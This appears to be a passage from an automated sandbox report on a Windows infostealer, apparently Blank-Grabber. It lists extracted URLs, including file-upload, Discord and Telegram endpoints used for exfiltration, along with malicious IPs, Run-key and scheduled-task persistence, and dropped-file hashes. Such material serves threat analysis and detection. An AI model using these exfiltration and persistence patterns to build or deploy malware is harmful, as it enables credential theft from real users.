                                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF4C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189355250.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164621490.00000281ACBF5000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031411910.00000281ACBF4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF4C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184336077.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031480408.00000281ABA66000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2029385987.00000281ACBD1000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachessB2ClgrGng.exe, 00000001.00000002.2188979517.00000281AB820000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brsB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABFBF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABFBF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABFBF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1892823881.00000281AC9AF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1824674501.00000281AC0BC000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1823342722.00000281AC033000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABFBF000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1827778807.00000281AC0F1000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281AC033000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      https://www.youtube.com/sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        https://allegro.pl/sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000033.00000002.1942613111.000001F2267A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            http://go.micword.exe, 00000055.00000002.2087146224.0000000000F38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF1D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF24000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF23000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF2E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186967243.00000281ABF23000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF24000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2030259986.00000281ABF13000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF24000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189091027.00000281AB920000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF1D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sysB2ClgrGng.exe, 00000001.00000003.1765814362.00000281A9CC0000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188382177.00000281A9C51000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  https://MD8.mozilla.org/1/msB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4C4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    https://www.python.org/psf/license/sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2197225283.00007FFDFB546000.00000040.00000001.01000000.00000004.sdmpfalse
                                                                                                                                      https://www.bbc.co.uk/sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        https://bugzilla.mosB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          https://api.anonfiles.com/uploadrsB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1784233182.00000281ABA90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            http://tools.ietf.org/html/rfc6125#section-6.4.3sB2ClgrGng.exe, 00000001.00000002.2191721671.00000281AC3E4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000D.00000002.1951924789.000002462ECB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                https://google.com/mailsB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281ABF76000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplessB2ClgrGng.exe, 00000001.00000003.2029385987.00000281ACBAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    https://www.python.org/psf/license/)sB2ClgrGng.exe, 00000001.00000002.2197225283.00007FFDFB442000.00000040.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                      https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pysB2ClgrGng.exe, 00000001.00000002.2188382177.00000281A9C51000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        https://www.google.com/sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4C4000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          https://www.iqiyi.com/sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            https://foss.heptapod.net/pypy/pypy/-/issues/3539sB2ClgrGng.exe, 00000001.00000002.2191571952.00000281AC220000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.sB2ClgrGng.exe, 00000001.00000003.2030259986.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189723544.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1810702061.00000281ABA5E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                http://google.com/sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF1D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF24000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF23000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF2E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186967243.00000281ABF23000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF24000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2030259986.00000281ABF13000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF24000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF1D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFsB2ClgrGng.exe, 00000001.00000003.1892823881.00000281AC9AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://api.gofile.io/getServerrsB2ClgrGng.exe, 00000001.00000003.1784233182.00000281ABA90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      http://ocsp.sectigo.com0sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        https://tools.ietf.org/html/rfc7231#section-4.3.6)sB2ClgrGng.exe, 00000001.00000003.1784156958.00000281ABEF0000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1784233182.00000281ABA0F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189091027.00000281ABA0F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1784156958.00000281ABEE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://contoso.com/Licensepowershell.exe, 00000033.00000002.1994798538.000001F235050000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://discordapp.com/api/v9/users/sB2ClgrGng.exe, 00000001.00000002.2189456125.00000281ABB20000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1784233182.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1810702061.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1900869577.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1852816239.00000281ABA73000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_sourcesB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB55C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                http://ip-api.com/json/?fields=225545rsB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specsB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB55C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    https://github.com/urllib3/urllib3/issues/2920sB2ClgrGng.exe, 00000001.00000002.2191721671.00000281AC330000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF4C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189355250.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164621490.00000281ACBF5000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031411910.00000281ACBF4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF4C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184336077.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031480408.00000281ABA66000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2029385987.00000281ACBD1000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_datasB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188382177.00000281A9C51000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://yahoo.com/sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281ABF76000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://account.bellmedia.csB2ClgrGng.exe, 00000001.00000003.2165800360.00000281AC9C6000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC52C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngp_UsB2ClgrGng.exe, 00000001.00000002.2188979517.00000281AB820000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6sB2ClgrGng.exe, 00000001.00000003.2030259986.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189723544.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://g.live.com/odclientsettings/ProdV2svchost.exe, 00000020.00000003.1849613191.000002224F0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://login.microsoftonline.comsB2ClgrGng.exe, 00000001.00000003.2165800360.00000281AC9C6000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC51C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        http://crl.thawte.com/ThawteTimestampingCA.crl0sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          https://html.spec.whatwg.org/multipage/sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281ABF76000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            https://www.ifeng.com/sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningssB2ClgrGng.exe, 00000001.00000002.2191571952.00000281AC220000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                https://www.zhihu.com/sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4C4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallsB2ClgrGng.exe, 00000001.00000003.2029385987.00000281ACBAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://www.rfc-editor.org/rfc/rfc8259#section-8.1sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281ABF76000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      https://contoso.com/powershell.exe, 00000033.00000002.1994798538.000001F235050000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://oneget.orgXpowershell.exe, 00000033.00000002.1942613111.000001F226496000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://api.gofile.io/getServersB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngsB2ClgrGng.exe, 00000001.00000002.2188979517.00000281AB820000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                              198.23.219.104
                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                              36352AS-COLOCROSSINGUStrue
                                                                                                                                                                                                                              149.154.167.220
                                                                                                                                                                                                                              api.telegram.orgUnited Kingdom
                                                                                                                                                                                                                              62041TELEGRAMRUtrue
                                                                                                                                                                                                                              208.95.112.1
                                                                                                                                                                                                                              ip-api.comUnited States
                                                                                                                                                                                                                              53334TUT-ASUSfalse
                                                                                                                                                                                                                              IP
                                                                                                                                                                                                                              127.0.0.1
                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                              Analysis ID:1532621
                                                                                                                                                                                                                              Start date and time:2024-10-13 19:00:08 +02:00
                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                              Overall analysis duration:0h 16m 4s
                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                              Number of analysed new started processes analysed:112
                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                              Sample name:sB2ClgrGng.exe
                                                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                                                              Original Sample Name:d69647cf1c96e058e4a9ed4887cc08a36c863751e711f98171e32cdc36478eda.exe
                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                              Classification:mal100.rans.troj.spyw.expl.evad.winEXE@172/70@2/4
                                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                                              • Successful, ratio: 28.6%
                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                              • Successful, ratio: 57%
                                                                                                                                                                                                                              • Number of executed functions: 94
                                                                                                                                                                                                                              • Number of non-executed functions: 187
                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 216.58.206.67, 184.28.90.27
                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, gstatic.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                              • Execution Graph export aborted for target mshta.exe, PID 7272 because there are no executed function
                                                                                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 7224 because it is empty
                                                                                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 8556 because it is empty
                                                                                                                                                                                                                              • Execution Graph export aborted for target word.exe, PID 4048 because it is empty
                                                                                                                                                                                                                              • Execution Graph export aborted for target word.exe, PID 5288 because it is empty
                                                                                                                                                                                                                              • Execution Graph export aborted for target word.exe, PID 7316 because it is empty
                                                                                                                                                                                                                              • Execution Graph export aborted for target word.exe, PID 7956 because it is empty
                                                                                                                                                                                                                              • Execution Graph export aborted for target word.exe, PID 8364 because it is empty
                                                                                                                                                                                                                              • Execution Graph export aborted for target word.exe, PID 8684 because it is empty
                                                                                                                                                                                                                              • Execution Graph export aborted for target word.exe, PID 8912 because it is empty
                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                                              13:01:14API Interceptor172x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                              13:01:14API Interceptor5x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                                              13:01:17API Interceptor3x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                              13:01:22API Interceptor14430201x Sleep call for process: bound.exe modified
                                                                                                                                                                                                                              18:01:19Task SchedulerRun new task: word path: C:\Users\user\AppData\Roaming\word.exe
                                                                                                                                                                                                                              18:01:22AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run word C:\Users\user\AppData\Roaming\word.exe
                                                                                                                                                                                                                              18:01:30AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run word C:\Users\user\AppData\Roaming\word.exe
                                                                                                                                                                                                                              18:01:38AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\word.lnk
                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                                              Entropy (8bit):0.363788168458258
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                                                                                                                                                                                                              MD5:0E72F896C84F1457C62C0E20338FAC0D
                                                                                                                                                                                                                              SHA1:9C071CC3D15E5BD8BF603391AE447202BD9F8537
